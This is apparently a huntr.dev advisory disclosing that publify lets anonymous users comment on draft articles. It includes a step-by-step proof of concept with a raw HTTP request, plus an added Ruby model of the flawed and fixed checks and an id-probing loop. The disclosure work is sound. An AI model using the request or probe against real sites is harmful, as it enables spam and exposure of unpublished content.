History: Feb 10, 2022 - 4:27 p.m.

Improper Access Control in publify/publify

2022-02-10 16:27:20
nhiephon
www.huntr.dev
access control
anonymous comments
vulnerability detection
admin permission
csrf attack
comment spam

EPSS

0.001

Percentile

30.0%

Description

An article in draft mode can only be viewed by admins who have permission to manage articles. Anonymous users cannot view a draft article, but they can still leave comments on it. The cause of the vulnerability is that a draft article is created with comments enabled, and the create_comment function only checks whether comments are enabled or disabled on the article, not whether the article is in draft or published mode.

Proof of Concept

  • Step 1: Log in with the demo account at https://demo-publify.herokuapp.com/admin. Create an article in draft mode and note its id.
  • Step 2: Visit the site in an anonymous session, obtain the session cookie and CSRF token, and send the following request with the id of the draft article.
POST /comments?article_id=3281 HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=c908f541644f3d97dbf90e4ef273253b
Content-Length: 130
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Csrf-Token: WHlz0364OOQtQuoHCuYkYeqBcxSgcp4xxj+gdu+z4dWXkwGhtLqZZgvy2j0YiQ1G+CJFiRdl3GlbO5w5ZxLkOg==
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo-publify.herokuapp.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

utf8=%E2%9C%93&comment%5Bauthor%5D=anon%40a.com&comment%5Burl%5D=&comment%5Bemail%5D=&comment%5Bbody%5D=anon+comment&submit=submit

Unpublish article: https://drive.google.com/file/d/17rev6klCS1zdY9zUU7umNjPJrpm8XU62

Create comment: https://drive.google.com/file/d/1iUJSmoqatVxtUdkU_6C_O9UP4Bkfsd9T

Impact

Anonymous users can leave comments on articles in draft mode. An attacker can also use the vulnerability to enumerate the ids of draft articles, since the comment endpoint responds differently for a draft id than for a nonexistent one, and can run a comment spam attack even when the blog has disabled comments on all of its public articles.
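The following is an added example and not publify's code: a minimal Ruby model of the comment gate described above, with the vulnerable check (comments-enabled flag only) beside a hardened one that also requires the article to be published, plus the id-probing loop that the Impact section refers to. The Article struct, the ARTICLES table, the state names and the function names are all constructed for the example.

```ruby
# Added example, not code from publify. A toy model of the comment gate so the
# draft-state check and the id-enumeration side effect can be run offline.

# Hypothetical model: publify's real Article class and state names differ.
Article = Struct.new(:id, :state, :allow_comments, keyword_init: true)

# Constructed sample data: ids 1-4 exist, id 5 does not.
ARTICLES = {
  1 => Article.new(id: 1, state: :published, allow_comments: true),
  2 => Article.new(id: 2, state: :published, allow_comments: false),
  3 => Article.new(id: 3, state: :draft,     allow_comments: true),
  4 => Article.new(id: 4, state: :draft,     allow_comments: false),
}.freeze

# Vulnerable gate, modelled on the behaviour the advisory describes:
# only the comments-enabled flag is consulted, never the draft/published state,
# so an anonymous comment on draft id 3 is accepted.
def create_comment_vulnerable(article_id)
  article = ARTICLES[article_id]
  return :not_found unless article
  return :comments_closed unless article.allow_comments
  :created
end

# Hardened gate: anonymous commenting requires a published article. A draft is
# answered exactly like a missing article so the response cannot be used to
# tell draft ids apart from unused ids.
def create_comment_fixed(article_id)
  article = ARTICLES[article_id]
  return :not_found unless article && article.state == :published
  return :comments_closed unless article.allow_comments
  :created
end

# Enumeration: an attacker walks a range of ids and keeps every id whose
# response differs from "not found". `gate` is the name of one of the two
# functions above.
def probe_ids(ids, gate)
  ids.select { |id| send(gate, id) != :not_found }
end

# True when the probe surfaces at least one draft id.
def draft_ids_leaked?(ids, gate)
  probe_ids(ids, gate).any? { |id| ARTICLES[id]&.state == :draft }
end

if __FILE__ == $PROGRAM_NAME
  ids = (1..5).to_a
  puts "vulnerable: draft 3 -> #{create_comment_vulnerable(3)}, probe -> #{probe_ids(ids, :create_comment_vulnerable)}"
  puts "fixed:      draft 3 -> #{create_comment_fixed(3)}, probe -> #{probe_ids(ids, :create_comment_fixed)}"
end
```

The point of the hardened version is not only the extra state check but that a draft and a nonexistent id produce the same response; if the fix returned a distinct "not published" error, the enumeration in probe_ids would still work. An admin preview path that legitimately comments on drafts would be authorised separately from this anonymous gate (an assumption about how such a fix would be structured, not something the advisory states).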
